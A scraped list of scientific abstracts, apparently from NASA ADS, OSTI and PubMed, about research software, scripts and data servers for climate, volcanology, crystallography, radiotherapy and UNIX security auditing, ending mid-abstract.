The APDRC was recently established within the International Pacific Research Center (IPRC) at the University of Hawaii. The APDRC mission is to increase understanding of climate variability in the Asia-Pacific region by developing the computational, data-management, and networking infrastructure necessary to make data resources readily accessible and usable by researchers, and by undertaking data-intensive research activities that will both advance knowledge and lead to improvements in data preparation and data products. A focus of recent activity is the implementation of user-friendly data servers. The APDRC is currently running a Live Access Server (LAS) developed at NOAA/PMEL to provide access to and visualization of gridded climate products via the web. The LAS also allows users to download the selected data subsets in various formats (such as binary, netCDF and ASCII). Most of the datasets served by the LAS are also served through our OPeNDAP server (formerly DODS), which allows users to directly access the data using their desktop client tools (e.g. GrADS, Matlab and Ferret). In addition, the APDRC is running an OPeNDAP Catalog/Aggregation Server (CAS) developed by Unidata at UCAR to serve climate data and products such as model output and satellite-derived products. These products are often large (> 2 GB) and are therefore stored as multiple files (stored separately in time or in parameters). The CAS remedies the inconvenience of multiple files and allows access to the whole dataset (or any subset that cuts across the multiple files) via a single request command from any DODS enabled client software. Once the aggregation of files is configured at the server (CAS), the process of aggregation is transparent to the user. The user only needs to know a single URL for the entire dataset, which is, in fact, stored as multiple files. CAS even allows aggregation of files on different systems and at different locations. Currently, the APDRC is serving NCEP, ECMWF, SODA, WOCE-Satellite, TMI, GPI and GSSTF products through the CAS. The APDRC is also running an EPIC server developed by PMEL/NOAA. EPIC is a web-based, data search and display system suited for in situ (station versus gridded) data. The process of locating and selecting individual station data from large collections (millions of profiles or time series, etc.) of in situ data is a major challenge. Serving in situ data on the Internet faces two problems: the irregularity of data formats; and the large quantity of data files. To solve the first problem, we have converted the in situ data into netCDF data format. The second problem was solved by using the EPIC server, which allows users to easily subset the files using a friendly graphical interface. Furthermore, we enhanced the capability of EPIC and configured OPeNDAP into EPIC to serve the numerous in situ data files and to export them to users through two different options: 1) an OPeNDAP pointer file of user-selected data files; and 2) a data package that includes meta-information (e.g., location, time, cruise no, etc.), a local pointer file, and the data files that the user selected. Option 1) is for those who do not want to download the selected data but want to use their own application software (such as GrADS, Matlab and Ferret) for access and analysis; option 2) is for users who want to store the data on their own system (e.g. laptops before going for a cruise) for subsequent analysis. Currently, WOCE CTD and bottle data, the WOCE current meter data, and some Argo float data are being served on the EPIC server.
NASA Astrophysics Data System (ADS)
Sansivero, Fabio; Vilardo, Giuseppe; Caputo, Teresa
2017-04-01
The permanent thermal infrared surveillance network of Osservatorio Vesuviano (INGV) is composed of 6 stations which acquire IR frames of fumarole fields in the Campi Flegrei caldera and inside the Vesuvius crater (Italy). The IR frames are uploaded to a dedicated server in the Surveillance Center of Osservatorio Vesuviano in order to process the infrared data and to excerpt all the information contained. In a first phase the infrared data are processed by an automated system (A.S.I.R.A. Acq- Automated System of IR Analysis and Acquisition) developed in Matlab environment and with a user-friendly graphic user interface (GUI). ASIRA daily generates time-series of residual temperature values of the maximum temperatures observed in the IR scenes after the removal of seasonal effects. These time-series are displayed in the Surveillance Room of Osservatorio Vesuviano and provide information about the evolution of shallow temperatures field of the observed areas. In particular the features of ASIRA Acq include: a) efficient quality selection of IR scenes, b) IR images co-registration in respect of a reference frame, c) seasonal correction by using a background-removal methodology, a) filing of IR matrices and of the processed data in shared archives accessible to interrogation. The daily archived records can be also processed by ASIRA Plot (Matlab code with GUI) to visualize IR data time-series and to help in evaluating inputs parameters for further data processing and analysis. Additional processing features are accomplished in a second phase by ASIRA Tools which is Matlab code with GUI developed to extract further information from the dataset in automated way. The main functions of ASIRA Tools are: a) the analysis of temperature variations of each pixel of the IR frame in a given time interval, b) the removal of seasonal effects from temperature of every pixel in the IR frames by using an analytic approach (removal of sinusoidal long term seasonal component by using a polynomial fit Matlab function - LTFC_SCOREF), c) the export of data in different raster formats (i.e. Surfer grd). An interesting example of elaborations of the data produced by ASIRA Tools is the map of the temperature changing rate, which provide remarkable information about the potential migration of fumarole activity. The high efficiency of Matlab in processing matrix data from IR scenes and the flexibility of this code-developing tool proved to be very useful to produce applications to use in volcanic surveillance aimed to monitor the evolution of surface temperatures field in diffuse degassing volcanic areas.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Bartoletti, T.
SPI/U3.1 consists of five tools used to assess and report the security posture of computers running the UNIX operating system. The tools are: Access Control Test: A rule-based system which identifies sequential dependencies in UNIX access controls. Binary Inspector Tool: Evaluates the release status of system binaries by comparing a crypto-checksum to provide table entries. Change Detection Tool: Maintains and applies a snapshot of critical system files and attributes for purposes of change detection. Configuration Query Language: Accepts CQL-based scripts (provided) to evaluate queries over the status of system files, configuration of services and many other elements of UNIX systemmore » security. Password Security Inspector: Tests for weak or aged passwords. The tools are packaged with a forms-based user interface providing on-line context-sensistive help, job scheduling, parameter management and output report management utilities. Tools may be run independent of the UI.« less
DOE Office of Scientific and Technical Information (OSTI.GOV)
Bartoletti, Tony
SPI/U3.2 consists of five tools used to assess and report the security posture of computers running the UNIX operating system. The tools are: Access Control Test: A rule-based system which identifies sequential dependencies in UNIX access controls. Binary Authentication Tool: Evaluates the release status of system binaries by comparing a crypto-checksum to provide table entries. Change Detection Tool: Maintains and applies a snapshot of critical system files and attributes for purposes of change detection. Configuration Query Language: Accepts CQL-based scripts (provided) to evaluate queries over the status of system files, configuration of services and many other elements of UNIX systemmore » security. Password Security Inspector: Tests for weak or aged passwords. The tools are packaged with a forms-based user interface providing on-line context-sensistive help, job scheduling, parameter management and output report management utilities. Tools may be run independent of the UI.« less
Serial femtosecond crystallography datasets from G protein-coupled receptors
White, Thomas A.; Barty, Anton; Liu, Wei; Ishchenko, Andrii; Zhang, Haitao; Gati, Cornelius; Zatsepin, Nadia A.; Basu, Shibom; Oberthür, Dominik; Metz, Markus; Beyerlein, Kenneth R.; Yoon, Chun Hong; Yefanov, Oleksandr M.; James, Daniel; Wang, Dingjie; Messerschmidt, Marc; Koglin, Jason E.; Boutet, Sébastien; Weierstall, Uwe; Cherezov, Vadim
2016-01-01
We describe the deposition of four datasets consisting of X-ray diffraction images acquired using serial femtosecond crystallography experiments on microcrystals of human G protein-coupled receptors, grown and delivered in lipidic cubic phase, at the Linac Coherent Light Source. The receptors are: the human serotonin receptor 2B in complex with an agonist ergotamine, the human δ-opioid receptor in complex with a bi-functional peptide ligand DIPP-NH2, the human smoothened receptor in complex with an antagonist cyclopamine, and finally the human angiotensin II type 1 receptor in complex with the selective antagonist ZD7155. All four datasets have been deposited, with minimal processing, in an HDF5-based file format, which can be used directly for crystallographic processing with CrystFEL or other software. We have provided processing scripts and supporting files for recent versions of CrystFEL, which can be used to validate the data. PMID:27479354
PROVAT: a tool for Voronoi tessellation analysis of protein structures and complexes.
Gore, Swanand P; Burke, David F; Blundell, Tom L
2005-08-01
Voronoi tessellation has proved to be a useful tool in protein structure analysis. We have developed PROVAT, a versatile public domain software that enables computation and visualization of Voronoi tessellations of proteins and protein complexes. It is a set of Python scripts that integrate freely available specialized software (Qhull, Pymol etc.) into a pipeline. The calculation component of the tool computes Voronoi tessellation of a given protein system in a way described by a user-supplied XML recipe and stores resulting neighbourhood information as text files with various styles. The Python pickle file generated in the process is used by the visualization component, a Pymol plug-in, that offers a GUI to explore the tessellation visually. PROVAT source code can be downloaded from http://raven.bioc.cam.ac.uk/~swanand/Provat1, which also provides a webserver for its calculation component, documentation and examples.
SPI/U3.2. Security Profile Inspector for UNIX Systems
DOE Office of Scientific and Technical Information (OSTI.GOV)
Bartoletti, A.
1994-08-01
SPI/U3.2 consists of five tools used to assess and report the security posture of computers running the UNIX operating system. The tools are: Access Control Test: A rule-based system which identifies sequential dependencies in UNIX access controls. Binary Authentication Tool: Evaluates the release status of system binaries by comparing a crypto-checksum to provide table entries. Change Detection Tool: Maintains and applies a snapshot of critical system files and attributes for purposes of change detection. Configuration Query Language: Accepts CQL-based scripts (provided) to evaluate queries over the status of system files, configuration of services and many other elements of UNIX systemmore » security. Password Security Inspector: Tests for weak or aged passwords. The tools are packaged with a forms-based user interface providing on-line context-sensistive help, job scheduling, parameter management and output report management utilities. Tools may be run independent of the UI.« less
Serial femtosecond crystallography datasets from G protein-coupled receptors.
White, Thomas A; Barty, Anton; Liu, Wei; Ishchenko, Andrii; Zhang, Haitao; Gati, Cornelius; Zatsepin, Nadia A; Basu, Shibom; Oberthür, Dominik; Metz, Markus; Beyerlein, Kenneth R; Yoon, Chun Hong; Yefanov, Oleksandr M; James, Daniel; Wang, Dingjie; Messerschmidt, Marc; Koglin, Jason E; Boutet, Sébastien; Weierstall, Uwe; Cherezov, Vadim
2016-08-01
We describe the deposition of four datasets consisting of X-ray diffraction images acquired using serial femtosecond crystallography experiments on microcrystals of human G protein-coupled receptors, grown and delivered in lipidic cubic phase, at the Linac Coherent Light Source. The receptors are: the human serotonin receptor 2B in complex with an agonist ergotamine, the human δ-opioid receptor in complex with a bi-functional peptide ligand DIPP-NH2, the human smoothened receptor in complex with an antagonist cyclopamine, and finally the human angiotensin II type 1 receptor in complex with the selective antagonist ZD7155. All four datasets have been deposited, with minimal processing, in an HDF5-based file format, which can be used directly for crystallographic processing with CrystFEL or other software. We have provided processing scripts and supporting files for recent versions of CrystFEL, which can be used to validate the data.
CircosVCF: circos visualization of whole-genome sequence variations stored in VCF files.
Drori, E; Levy, D; Smirin-Yosef, P; Rahimi, O; Salmon-Divon, M
2017-05-01
Visualization of whole-genomic variations in a meaningful manner assists researchers in gaining new insights into the underlying data, especially when it comes in the context of whole genome comparisons. CircosVCF is a web based visualization tool for genome-wide variant data described in VCF files, using circos plots. The user friendly interface of CircosVCF supports an interactive design of the circles in the plot, and the integration of additional information such as experimental data or annotations. The provided visualization capabilities give a broad overview of the genomic relationships between genomes, and allow identification of specific meaningful SNPs regions. CircosVCF was implemented in JavaScript and is available at http://www.ariel.ac.il/research/fbl/software. malisa@ariel.ac.il. Supplementary data are available at Bioinformatics online. © The Author 2017. Published by Oxford University Press. All rights reserved. For Permissions, please e-mail: journals.permissions@oup.com
Poster — Thur Eve — 55: An automated XML technique for isocentre verification on the Varian TrueBeam
DOE Office of Scientific and Technical Information (OSTI.GOV)
Asiev, Krum; Mullins, Joel; DeBlois, François
2014-08-15
Isocentre verification tests, such as the Winston-Lutz (WL) test, have gained popularity in the recent years as techniques such as stereotactic radiosurgery/radiotherapy (SRS/SRT) treatments are more commonly performed on radiotherapy linacs. These highly conformal treatments require frequent monitoring of the geometrical accuracy of the isocentre to ensure proper radiation delivery. At our clinic, the WL test is performed by acquiring with the EPID a collection of 8 images of a WL phantom fixed on the couch for various couch/gantry angles. This set of images is later analyzed to determine the isocentre size. The current work addresses the acquisition process. Amore » manual WL test acquisition performed by and experienced physicist takes in average 25 minutes and is prone to user manipulation errors. We have automated this acquisition on a Varian TrueBeam STx linac (Varian, Palo Alto, USA). The Varian developer mode allows the execution of custom-made XML script files to control all aspects of the linac operation. We have created an XML-WL script that cycles through each couch/gantry combinations taking an EPID image at each position. This automated acquisition is done in less than 4 minutes. The reproducibility of the method was verified by repeating the execution of the XML file 5 times. The analysis of the images showed variation of the isocenter size less than 0.1 mm along the X, Y and Z axes and compares favorably to a manual acquisition for which we typically observe variations up to 0.5 mm.« less
Advanced Small Modular Reactor Economics Model Development
DOE Office of Scientific and Technical Information (OSTI.GOV)
Harrison, Thomas J.
2014-10-01
The US Department of Energy Office of Nuclear Energy’s Advanced Small Modular Reactor (SMR) research and development activities focus on four key areas: Developing assessment methods for evaluating advanced SMR technologies and characteristics; and Developing and testing of materials, fuels and fabrication techniques; and Resolving key regulatory issues identified by US Nuclear Regulatory Commission and industry; and Developing advanced instrumentation and controls and human-machine interfaces. This report focuses on development of assessment methods to evaluate advanced SMR technologies and characteristics. Specifically, this report describes the expansion and application of the economic modeling effort at Oak Ridge National Laboratory. Analysis ofmore » the current modeling methods shows that one of the primary concerns for the modeling effort is the handling of uncertainty in cost estimates. Monte Carlo–based methods are commonly used to handle uncertainty, especially when implemented by a stand-alone script within a program such as Python or MATLAB. However, a script-based model requires each potential user to have access to a compiler and an executable capable of handling the script. Making the model accessible to multiple independent analysts is best accomplished by implementing the model in a common computing tool such as Microsoft Excel. Excel is readily available and accessible to most system analysts, but it is not designed for straightforward implementation of a Monte Carlo–based method. Using a Monte Carlo algorithm requires in-spreadsheet scripting and statistical analyses or the use of add-ons such as Crystal Ball. An alternative method uses propagation of error calculations in the existing Excel-based system to estimate system cost uncertainty. This method has the advantage of using Microsoft Excel as is, but it requires the use of simplifying assumptions. These assumptions do not necessarily bring into question the analytical results. In fact, the analysis shows that the propagation of error method introduces essentially negligible error, especially when compared to the uncertainty associated with some of the estimates themselves. The results of these uncertainty analyses generally quantify and identify the sources of uncertainty in the overall cost estimation. The obvious generalization—that capital cost uncertainty is the main driver—can be shown to be an accurate generalization for the current state of reactor cost analysis. However, the detailed analysis on a component-by-component basis helps to demonstrate which components would benefit most from research and development to decrease the uncertainty, as well as which components would benefit from research and development to decrease the absolute cost.« less
Verification Testing: Meet User Needs Figure of Merit
NASA Technical Reports Server (NTRS)
Kelly, Bryan W.; Welch, Bryan W.
2017-01-01
Verification is the process through which Modeling and Simulation(M&S) software goes to ensure that it has been rigorously tested and debugged for its intended use. Validation confirms that said software accurately models and represents the real world system. Credibility gives an assessment of the development and testing effort that the software has gone through as well as how accurate and reliable test results are. Together, these three components form Verification, Validation, and Credibility(VV&C), the process by which all NASA modeling software is to be tested to ensure that it is ready for implementation. NASA created this process following the CAIB (Columbia Accident Investigation Board) report seeking to understand the reasons the Columbia space shuttle failed during reentry. The reports conclusion was that the accident was fully avoidable, however, among other issues, the necessary data to make an informed decision was not there and the result was complete loss of the shuttle and crew. In an effort to mitigate this problem, NASA put out their Standard for Models and Simulations, currently in version NASA-STD-7009A, in which they detailed their recommendations, requirements and rationale for the different components of VV&C. They did this with the intention that it would allow for people receiving MS software to clearly understand and have data from the past development effort. This in turn would allow the people who had not worked with the MS software before to move forward with greater confidence and efficiency in their work. This particular project looks to perform Verification on several MATLAB (Registered Trademark)(The MathWorks, Inc.) scripts that will be later implemented in a website interface. It seeks to take note and define the limits of operation, the units and significance, and the expected datatype and format of the inputs and outputs of each of the scripts. This is intended to prevent the code from attempting to make incorrect or impossible calculations. Additionally, this project will look at the coding generally and note inconsistencies, redundancies, and other aspects that may become problematic or slow down the codes run time. Certain scripts lacking in documentation also will be commented and cataloged.
Geologic map of the San Bernardino North 7.5' quadrangle, San Bernardino County, California
Miller, F.K.; Matti, J.C.
2001-01-01
3. Portable Document Format (.pdf) files of: a. This Readme; includes an Appendix, containing data found in sbnorth_met.txt . b. The Description of Map Units identical to that found on the plot of the PostScript file. c. The same graphic as plotted in 2 above. (Test plots from this .pdf do not produce 1:24,000-scale maps. Use Adobe Acrobat pagesize setting to control map scale.) The Correlation of Map Units and Description of Map Units is in the editorial format of USGS Miscellaneous Investigations Series (I-series) maps. Within the geologic map data package, map units are identified by standard geologic map criteria such as formation-name, age, and lithology. Even though this is an author-prepared report, every attempt has been made to closely adhere to the stratigraphic nomenclature of the U. S. Geological Survey. Descriptions of units can be obtained by viewing or plotting the .pdf file (3b above) or plotting the postscript file (2 above). If roads in some areas, especially forest roads that parallel topographic contours, do not show well on plots of the geologic map, we recommend use of the USGS San Bernardino North 7.5’ topographic quadrangle in conjunction with the geologic map.
SU-E-T-142: Automatic Linac Log File: Analysis and Reporting
DOE Office of Scientific and Technical Information (OSTI.GOV)
Gainey, M; Rothe, T
Purpose: End to end QA for IMRT/VMAT is time consuming. Automated linac log file analysis and recalculation of daily recorded fluence, and hence dose, distribution bring this closer. Methods: Matlab (R2014b, Mathworks) software was written to read in and analyse IMRT/VMAT trajectory log files (TrueBeam 1.5, Varian Medical Systems) overnight, and are archived on a backed-up network drive (figure). A summary report (PDF) is sent by email to the duty linac physicist. A structured summary report (PDF) for each patient is automatically updated for embedding into the R&V system (Mosaiq 2.5, Elekta AG). The report contains cross-referenced hyperlinks to easemore » navigation between treatment fractions. Gamma analysis can be performed on planned (DICOM RTPlan) and treated (trajectory log) fluence distributions. Trajectory log files can be converted into RTPlan files for dose distribution calculation (Eclipse, AAA10.0.28, VMS). Results: All leaf positions are within +/−0.10mm: 57% within +/−0.01mm; 89% within 0.05mm. Mean leaf position deviation is 0.02mm. Gantry angle variations lie in the range −0.1 to 0.3 degrees, mean 0.04 degrees. Fluence verification shows excellent agreement between planned and treated fluence. Agreement between planned and treated dose distribution, the derived from log files, is very good. Conclusion: Automated log file analysis is a valuable tool for the busy physicist, enabling potential treated fluence distribution errors to be quickly identified. In the near future we will correlate trajectory log analysis with routine IMRT/VMAT QA analysis. This has the potential to reduce, but not eliminate, the QA workload.« less
Gross, Brooks A.; Walsh, Christine M.; Turakhia, Apurva A.; Booth, Victoria; Mashour, George; Poe, Gina R.
2009-01-01
Manual state scoring of physiological recordings in sleep studies is time-consuming, resulting in a data backlog, research delays and increased personnel costs. We developed MATLAB-based software to automate scoring of sleep/waking states in rats, potentially extendable to other animals, from a variety of recording systems. The software contains two programs, Sleep Scorer and Auto-Scorer, for manual and automated scoring. Auto-Scorer is a logic-based program that displays power spectral densities of an electromyographic signal and σ, δ, and θ frequency bands of an electroencephalographic signal, along with the δ/θ ratio and σ ×θ, for every epoch. The user defines thresholds from the training file state definitions which the Auto-Scorer uses with logic to discriminate the state of every epoch in the file. Auto-Scorer was evaluated by comparing its output to manually scored files from 6 rats under 2 experimental conditions by 3 users. Each user generated a training file, set thresholds, and autoscored the 12 files into 4 states (waking, non-REM, transition-to-REM, and REM sleep) in ¼ the time required to manually score the file. Overall performance comparisons between Auto-Scorer and manual scoring resulted in a mean agreement of 80.24 +/− 7.87%, comparable to the average agreement among 3 manual scorers (83.03 +/− 4.00%). There was no significant difference between user-user and user-Auto-Scorer agreement ratios. These results support the use of our open-source Auto-Scorer, coupled with user review, to rapidly and accurately score sleep/waking states from rat recordings. PMID:19615408
Photogrammetric Method and Software for Stream Planform Identification
NASA Astrophysics Data System (ADS)
Stonedahl, S. H.; Stonedahl, F.; Lohberg, M. M.; Lusk, K.; Miller, D.
2013-12-01
Accurately characterizing the planform of a stream is important for many purposes, including recording measurement and sampling locations, monitoring change due to erosion or volumetric discharge, and spatial modeling of stream processes. While expensive surveying equipment or high resolution aerial photography can be used to obtain planform data, our research focused on developing a close-range photogrammetric method (and accompanying free/open-source software) to serve as a cost-effective alternative. This method involves securing and floating a wooden square frame on the stream surface at several locations, taking photographs from numerous angles at each location, and then post-processing and merging data from these photos using the corners of the square for reference points, unit scale, and perspective correction. For our test field site we chose a ~35m reach along Black Hawk Creek in Sunderbruch Park (Davenport, IA), a small, slow-moving stream with overhanging trees. To quantify error we measured 88 distances between 30 marked control points along the reach. We calculated error by comparing these 'ground truth' distances to the corresponding distances extracted from our photogrammetric method. We placed the square at three locations along our reach and photographed it from multiple angles. The square corners, visible control points, and visible stream outline were hand-marked in these photos using the GIMP (open-source image editor). We wrote an open-source GUI in Java (hosted on GitHub), which allows the user to load marked-up photos, designate square corners and label control points. The GUI also extracts the marked pixel coordinates from the images. We also wrote several scripts (currently in MATLAB) that correct the pixel coordinates for radial distortion using Brown's lens distortion model, correct for perspective by forcing the four square corner pixels to form a parallelogram in 3-space, and rotate the points in order to correctly orient all photos of the same square location. Planform data from multiple photos (and multiple square locations) are combined using weighting functions that mitigate the error stemming from the markup-process, imperfect camera calibration, etc. We have used our (beta) software to mark and process over 100 photos, yielding an average error of only 1.5% relative to our 88 measured lengths. Next we plan to translate the MATLAB scripts into Python and release their source code, at which point only free software, consumer-grade digital cameras, and inexpensive building materials will be needed for others to replicate this method at new field sites. Three sample photographs of the square with the created planform and control points
FlaME: Flash Molecular Editor - a 2D structure input tool for the web
2011-01-01
Background So far, there have been no Flash-based web tools available for chemical structure input. The authors herein present a feasibility study, aiming at the development of a compact and easy-to-use 2D structure editor, using Adobe's Flash technology and its programming language, ActionScript. As a reference model application from the Java world, we selected the Java Molecular Editor (JME). In this feasibility study, we made an attempt to realize a subset of JME's functionality in the Flash Molecular Editor (FlaME) utility. These basic capabilities are: structure input, editing and depiction of single molecules, data import and export in molfile format. Implementation The result of molecular diagram sketching in FlaME is accessible in V2000 molfile format. By integrating the molecular editor into a web page, its communication with the HTML elements on this page is established using the two JavaScript functions, getMol() and setMol(). In addition, structures can be copied to the system clipboard. Conclusion A first attempt was made to create a compact single-file application for 2D molecular structure input/editing on the web, based on Flash technology. With the application examples presented in this article, it could be demonstrated that the Flash methods are principally well-suited to provide the requisite communication between the Flash object (application) and the HTML elements on a web page, using JavaScript functions. PMID:21284863
Visualization of protein sequence features using JavaScript and SVG with pViz.js.
Mukhyala, Kiran; Masselot, Alexandre
2014-12-01
pViz.js is a visualization library for displaying protein sequence features in a Web browser. By simply providing a sequence and the locations of its features, this lightweight, yet versatile, JavaScript library renders an interactive view of the protein features. Interactive exploration of protein sequence features over the Web is a common need in Bioinformatics. Although many Web sites have developed viewers to display these features, their implementations are usually focused on data from a specific source or use case. Some of these viewers can be adapted to fit other use cases but are not designed to be reusable. pViz makes it easy to display features as boxes aligned to a protein sequence with zooming functionality but also includes predefined renderings for secondary structure and post-translational modifications. The library is designed to further customize this view. We demonstrate such applications of pViz using two examples: a proteomic data visualization tool with an embedded viewer for displaying features on protein structure, and a tool to visualize the results of the variant_effect_predictor tool from Ensembl. pViz.js is a JavaScript library, available on github at https://github.com/Genentech/pviz. This site includes examples and functional applications, installation instructions and usage documentation. A Readme file, which explains how to use pViz with examples, is available as Supplementary Material A. © The Author 2014. Published by Oxford University Press. All rights reserved. For Permissions, please e-mail: journals.permissions@oup.com.
Dr.LiTHO: a development and research lithography simulator
NASA Astrophysics Data System (ADS)
Fühner, Tim; Schnattinger, Thomas; Ardelean, Gheorghe; Erdmann, Andreas
2007-03-01
This paper introduces Dr.LiTHO, a research and development oriented lithography simulation environment developed at Fraunhofer IISB to flexibly integrate our simulation models into one coherent platform. We propose a light-weight approach to a lithography simulation environment: The use of a scripting (batch) language as an integration platform. Out of the great variety of different scripting languages, Python proved superior in many ways: It exhibits a good-natured learning-curve, it is efficient, available on virtually any platform, and provides sophisticated integration mechanisms for existing programs. In this paper, we will describe the steps, required to provide Python bindings for existing programs and to finally generate an integrated simulation environment. In addition, we will give a short introduction into selected software design demands associated with the development of such a framework. We will especially focus on testing and (both technical and user-oriented) documentation issues. Dr.LiTHO Python files contain not only all simulation parameter settings but also the simulation flow, providing maximum flexibility. In addition to relatively simple batch jobs, repetitive tasks can be pooled in libraries. And as Python is a full-blown programming language, users can add virtually any functionality, which is especially useful in the scope of simulation studies or optimization tasks, that often require masses of evaluations. Furthermore, we will give a short overview of the numerous existing Python packages. Several examples demonstrate the feasibility and productiveness of integrating Python packages into custom Dr.LiTHO scripts.
Cummings, Michael T.; Joh, Richard I.; Motamedi, Mo
2015-01-01
The fission (Schizosaccharomyces pombe) and budding (Saccharomyces cerevisiae) yeasts have served as excellent models for many seminal discoveries in eukaryotic biology. In these organisms, genes are deleted or tagged easily by transforming cells with PCR-generated DNA inserts, flanked by short (50-100bp) regions of gene homology. These PCR reactions use especially designed long primers, which, in addition to the priming sites, carry homology for gene targeting. Primer design follows a fixed method but is tedious and time-consuming especially when done for a large number of genes. To automate this process, we developed the Python-based Genome Retrieval Script (GRS), an easily customizable open-source script for genome analysis. Using GRS, we created PRIMED, the complete PRIMEr D atabase for deleting and C-terminal tagging genes in the main S. pombe and five of the most commonly used S. cerevisiae strains. Because of the importance of noncoding RNAs (ncRNAs) in many biological processes, we also included the deletion primer set for these features in each genome. PRIMED are accurate and comprehensive and are provided as downloadable Excel files, removing the need for future primer design, especially for large-scale functional analyses. Furthermore, the open-source GRS can be used broadly to retrieve genome information from custom or other annotated genomes, thus providing a suitable platform for building other genomic tools by the yeast or other research communities. PMID:25643023
NASA Technical Reports Server (NTRS)
OFarrell, Zachary L.
2013-01-01
The goal of this project is to create a website that displays video, countdown clock, and event times to customers during launches, without needing to be connected to the internal operations network. The requirements of this project are to also minimize the delay in the clock and events to be less than two seconds. The two parts of this are the webpage, which will display the data and videos to the user, and a server to send clock and event data to the webpage. The webpage is written in HTML with CSS and JavaScript. The JavaScript is responsible for connecting to the server, receiving new clock data, and updating the webpage. JavaScript is used for this because it can send custom HTTP requests from the webpage, and provides the ability to update parts of the webpage without having to refresh the entire page. The server application will act as a relay between the operations network, and the open internet. On the operations network side, the application receives multicast packets that contain countdown clock and events data. It will then parse the data into current countdown times and events, and create a packet with that information that can be sent to webpages. The other part will accept HTTP requests from the webpage, and respond to them with current data. The server is written in C# with some C++ files used to define the structure of data packets. The videos for the webpage will be shown in an embedded player from UStream.
Sauvage, Thomas; Plouviez, Sophie; Schmidt, William E; Fredericq, Suzanne
2018-03-05
The body of DNA sequence data lacking taxonomically informative sequence headers is rapidly growing in user and public databases (e.g. sequences lacking identification and contaminants). In the context of systematics studies, sorting such sequence data for taxonomic curation and/or molecular diversity characterization (e.g. crypticism) often requires the building of exploratory phylogenetic trees with reference taxa. The subsequent step of segregating DNA sequences of interest based on observed topological relationships can represent a challenging task, especially for large datasets. We have written TREE2FASTA, a Perl script that enables and expedites the sorting of FASTA-formatted sequence data from exploratory phylogenetic trees. TREE2FASTA takes advantage of the interactive, rapid point-and-click color selection and/or annotations of tree leaves in the popular Java tree-viewer FigTree to segregate groups of FASTA sequences of interest to separate files. TREE2FASTA allows for both simple and nested segregation designs to facilitate the simultaneous preparation of multiple data sets that may overlap in sequence content.
Port-O-Sim Object Simulation Application
NASA Technical Reports Server (NTRS)
Lanzi, Raymond J.
2009-01-01
Port-O-Sim is a software application that supports engineering modeling and simulation of launch-range systems and subsystems, as well as the vehicles that operate on them. It is flexible, distributed, object-oriented, and realtime. A scripting language is used to configure an array of simulation objects and link them together. The script is contained in a text file, but executed and controlled using a graphical user interface. A set of modules is defined, each with input variables, output variables, and settings. These engineering models can be either linked to each other or run as standalone. The settings can be modified during execution. Since 2001, this application has been used for pre-mission failure mode training for many Range Safety Scenarios. It contains range asset link analysis, develops look-angle data, supports sky-screen site selection, drives GPS (Global Positioning System) and IMU (Inertial Measurement Unit) simulators, and can support conceptual design efforts for multiple flight programs with its capacity for rapid six-degrees-of-freedom model development. Due to the assembly of various object types into one application, the application is applicable across a wide variety of launch range problem domains.
XML-based scripting of multimodality image presentations in multidisciplinary clinical conferences
NASA Astrophysics Data System (ADS)
Ratib, Osman M.; Allada, Vivekanand; Dahlbom, Magdalena; Marcus, Phillip; Fine, Ian; Lapstra, Lorelle
2002-05-01
We developed a multi-modality image presentation software for display and analysis of images and related data from different imaging modalities. The software is part of a cardiac image review and presentation platform that supports integration of digital images and data from digital and analog media such as videotapes, analog x-ray films and 35 mm cine films. The software supports standard DICOM image files as well as AVI and PDF data formats. The system is integrated in a digital conferencing room that includes projections of digital and analog sources, remote videoconferencing capabilities, and an electronic whiteboard. The goal of this pilot project is to: 1) develop a new paradigm for image and data management for presentation in a clinically meaningful sequence adapted to case-specific scenarios, 2) design and implement a multi-modality review and conferencing workstation using component technology and customizable 'plug-in' architecture to support complex review and diagnostic tasks applicable to all cardiac imaging modalities and 3) develop an XML-based scripting model of image and data presentation for clinical review and decision making during routine clinical tasks and multidisciplinary clinical conferences.
HRMA calibration handbook: EKC gravity compensated XRCF models
NASA Technical Reports Server (NTRS)
Tananbaum, H. D.; Jerius, D.; Hughes, J.
1994-01-01
This document, consisting of hardcopy printout of explanatory text, figures, and tables, represents one incarnation of the AXAF high resolution mirror assembly (HRMA) Calibration Handbook. However, as we have envisioned it, the handbook also consists of electronic versions of this hardcopy printout (in the form of postscript files), the individual scripts which produced the various figures and the associated input data, the model raytrace files, and all scripts, parameter files, and input data necessary to generate the raytraces. These data are all available electronically as either ASCII or FITS files. The handbook is intended to be a living document and will be updated as new information and/or fabrication data on the HRMA are obtained, or when the need for additional results are indicated. The SAO Mission Support Team (MST) is developing a high fidelity HRMA model, consisting of analytical and numerical calculations, computer software, and databases of fundamental physical constants, laboratory measurements, configuration data, finite element models, AXAF assembly data, and so on. This model serves as the basis for the simulations presented in the handbook. The 'core' of the model is the raytrace package OSAC, which we have substantially modified and now refer to as SAOsac. One major structural modification to the software has been to utilize the UNIX binary pipe data transport mechanism for passing rays between program modules. This change has made it possible to simulate rays which are distributed randomly over the entrance aperture of the telescope. It has also resulted in a highly efficient system for tracing large numbers of rays. In one application to date (the analysis of VETA-I ring focus data) we have employed 2 x 10(exp 7) rays, a substantial improvement over the limit of 1 x 10(exp 4) rays in the original OSAC module. A second major modification is the manner in which SAOsac incorporates low spatial frequency surface errors into the geometric raytrace. The original OSAC included the ability to use Legendre-Fourier polynomials to describe deviations from the basic optical prescription. To this we have added bicubic splines to address a deficiency in the handling of the sharper deformations in the areas of mirror support pads. SAO has developed software (TRANS-FIT) to translate the most common finite element analysis models into these forms for incorporation into the raytrace program.
HRMA calibration handbook: EKC gravity compensated XRCF models
NASA Astrophysics Data System (ADS)
Tananbaum, H. D.; Jerius, D.; Hughes, J.
1994-06-01
This document, consisting of hardcopy printout of explanatory text, figures, and tables, represents one incarnation of the AXAF high resolution mirror assembly (HRMA) Calibration Handbook. However, as we have envisioned it, the handbook also consists of electronic versions of this hardcopy printout (in the form of postscript files), the individual scripts which produced the various figures and the associated input data, the model raytrace files, and all scripts, parameter files, and input data necessary to generate the raytraces. These data are all available electronically as either ASCII or FITS files. The handbook is intended to be a living document and will be updated as new information and/or fabrication data on the HRMA are obtained, or when the need for additional results are indicated. The SAO Mission Support Team (MST) is developing a high fidelity HRMA model, consisting of analytical and numerical calculations, computer software, and databases of fundamental physical constants, laboratory measurements, configuration data, finite element models, AXAF assembly data, and so on. This model serves as the basis for the simulations presented in the handbook. The 'core' of the model is the raytrace package OSAC, which we have substantially modified and now refer to as SAOsac. One major structural modification to the software has been to utilize the UNIX binary pipe data transport mechanism for passing rays between program modules. This change has made it possible to simulate rays which are distributed 